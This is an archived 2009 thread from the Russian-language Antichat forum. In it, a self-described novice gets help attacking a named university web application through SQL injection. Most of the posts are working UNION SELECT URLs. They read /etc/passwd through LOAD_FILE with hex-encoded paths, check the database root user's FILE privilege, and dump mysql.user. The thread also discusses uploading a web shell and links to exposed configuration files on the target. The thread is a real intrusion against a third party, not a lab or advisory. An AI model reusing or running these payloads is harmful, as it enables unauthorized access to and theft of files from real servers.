ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.07.2009, 00:43
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+concat_ws(0x3a, LOAD_FILE(0x2f6574632f706173737764)),2,3,4,5+limit +1,1/*
вто инъекция под рутом.
Вопрос 1. Почему не работает вот так а) (/etc/passwd) b) ('/etc/passwd')
вопрос 2. Возможно ли залить шелл туда?
Извиняюсь за нубский вопрос, но прошу помощи плиз.
|
|
|
07.07.2009, 00:46
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
1.magic_quotes_gpc,addslashes или ещё что-нибудь.
2.Зачем ты юзаешь concat_ws() ? Убери всё и сделай так:
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6 574632f706173737764)/*
|
|
|
|
07.07.2009, 00:48
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от Велемир
1.magic_quotes_gpc,addslashes или ещё что-нибудь.
2.Зачем ты юзаешь concat_ws() ? Убери всё и сделай так:
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6 574632f706173737764)/*
Есть ли при таких абстоятельсвах возможность залить шелл?
|
|
|
|
07.07.2009, 00:51
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Проверь права: select concat_ws(0x3a,user,file_priv) from mhsql.user where user=твой юзер в HEX
Если У - то можно полюбас.Если N - обломался,чуваг.
|
|
|
|
07.07.2009, 00:55
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от Велемир
Проверь права: select concat_ws(0x3a,user,file_priv) from mhsql.user where user=твой юзер в HEX
Если У - то можно полюбас.Если N - обломался,чуваг.
Помоги составить этот запрос на данном примере плиз. Я просто новичок.
Код HTML:
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5+limit+1,1/*
|
|
|
|
07.07.2009, 01:06
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=-21595+union+select+unhex(hex(concat_ws(0x3a,user,f ile_priv))),2,3,4,5+from+mysql.user+where+user=0x7 26F6F74/*
Повезло
|
|
|
|
07.07.2009, 11:20
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402
Репутация:
22
|
|
Даже вот так можно
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=-21595+union+select+unhex(hex(group_concat(0x0a,use r,0x3a,file_priv))),2,3,4,5+from+mysql.user/*
|
|
|
|
07.07.2009, 12:04
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Спс. люди. А теперь мне помогите залить туда файл /tmp/phpinfo.php
с текстом <? phpinfo(); ?>
Я читал статьи на ачате, но там при заливке юзались ковычки и слэши а тут они вырублены. плиз подскажите
add
snake: ты её уже залил? помоги плиз соствит запрос.
Последний раз редактировалось nub-hacker; 07.07.2009 в 12:19..
|
|
|
|
07.07.2009, 12:05
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://yarra.ics.uci.edu/phpinfo.php
в помощь тебе, теперь залить станет легче...если конечно под запись найдешь диру))
|
|
|
|
07.07.2009, 13:50
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
А может и это поможет:
Код:
http://yarra.ics.uci.edu/bb/enrondemo/localhost/soa.properties
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид